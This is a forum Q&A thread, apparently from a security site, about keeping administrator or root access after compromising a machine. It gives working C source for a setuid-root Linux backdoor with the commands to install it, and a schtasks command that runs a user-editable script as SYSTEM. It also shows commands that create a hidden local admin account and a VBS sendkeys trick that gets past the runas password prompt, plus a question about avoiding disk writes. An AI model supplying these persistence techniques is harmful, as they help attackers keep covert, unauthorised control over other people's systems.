# How to backdoor windows?

Tags: windows, linux, backdoor, root

Studing pentest, I was astonished by how easy it was to backdoor a Linux machine after I got root. I just needed to compile a program like this:

```
#define _GNU_SOURCE
#include <stdlib.h>
#include <unistd.h>

int main (int argc, char **argv){
    setresuid(0,0,0);
    system(argv[1]);
}
```

And then run these commands:

```
chown root:root backdoor
chmod 4755 backdoor
```

So now, any user can execute commands as root by using the backdoor:

```
./backdoor whoami
```

However, I don't see any easy solution on how to backdoor a windows system like I did with linux. So I want to do this lame question:

How can I backdoor a windows system after I get the **`root`** equivalent (**`NT AUTHORITY\SYSTEM`**)?

Comment: Are you asking how to escalate privileges?

Comment: You don't need to compile anything. Copy `bash` somewhere as root and use `chmod +s bash`. It's not a backdoor, it's an intended mechanism working as designed.

Comment: @pcalkins No, I want to ask what you do AFTER you escalate privilege. To maintain it!

Comment: @ThoriumBR Wow.... This is new :P It's even easier!

Comment: Maybe this is an answer?: https://learn.microsoft.com/en-us/windows/win32/msi/installing-a-package-with-elevated-privileges-for-a-non-admin

Comment: It's not quite a backdoor imho though...

Comment: The question and the comments are not consistent. I will not address how to backdoor a Windows system but how to maintain privileges. To maintain privileges you start replacing services. Put in your own `sshd` with a fake user that runs as uid 0. Trojan `httpd` to give you access to another suid program. If you have shell access, litter the file system with suid binaries or modify `sudo` to recognize you or even put in a special case in `passwd`. Way too many possibilities to enumerate. Once you have root then the system is yours forever.

Answer (score 1):

First of all, you and I seem to have different understanding of "backdoor". For me, if anyone speaks about a backdoor, I imagine something allowing the attacker to control the machine remotely - for example, a trojan, or RAT, or user account they can use to log in, or webshell etc.

What you are talking is something different - how to be able to run an arbitrary command as administrator (or NT AUTHORITY\SYSTEM).

There are multiple ways of course; the first thing popping into my mind is to create a scheduled task that would run any 5 minutes and execute a CMD script located in a folder accessible to the user (`%temp%` would do just great - however, in my example I've used a path which is a bit easier to access).

```
schtasks /create /tn "TestBackdoor" /sc minute /mo 5 /tr "C:\temp\test.cmd" /RU System
```

Then the user can just create or edit this file, putting any command he likes - it will be executed when the scheduled task runs. For example,

```
mkdir "C:\temp\btest"
```

Not a perfect backdoor and quite noisy also - but it's simple, and I thought the key question here was simplicity.

[image]

Credit for help with commands to create a scheduled task goes to:

https://superuser.com/questions/850299/windows-scheduler-that-runs-every-x-minutes-daily-on-the-command-line

https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/schtasks-create#to-schedule-a-task-that-runs-with-system-permissions

Answer (score 0):

I find another way to do this.

First, create a user

```
NET USER myuser pass /EXPIRES:NEVER /PASSWORDCHG:NO /TIMES:ALL /WORKSTATIONS:* /ADD
```

Next, add him to the local admin group

```
NET LOCALGROUP Administrators myuser /ADD
```

Now I need to impersonate the user, but `runas` will always ask for the password. Luckily, I find [this tip](https://stackoverflow.com/a/69441418/20383014).

```
echo Set x=CreateObject("wscript.shell")>C:\windows\temp\pass.vbs
echo wscript.sleep 1000   >>C:\windows\temp\pass.vbs
echo x.sendkeys "pass"    >>C:\windows\temp\pass.vbs
echo x.sendkeys "{enter}" >>C:\windows\temp\pass.vbs
start C:\windows\temp\pass.vbs
runas /user:myuser "cmd.exe /c whoami>C:\windows\temp\res.txt"
```

Or in one line:

```
echo Set x=CreateObject("wscript.shell"):wscript.sleep 1000:x.sendkeys "pass":x.sendkeys "{enter}">C:\windows\temp\pass.vbs && start C:\windows\temp\pass.vbs && runas /user:myuser "cmd.exe /c whoami>C:\windows\temp\res.txt" && type C:\windows\temp\res.txt
```

Well, this look like the SUID version in windows.

Comment: Anyone know how to execute the vbs script without writing the file on disk?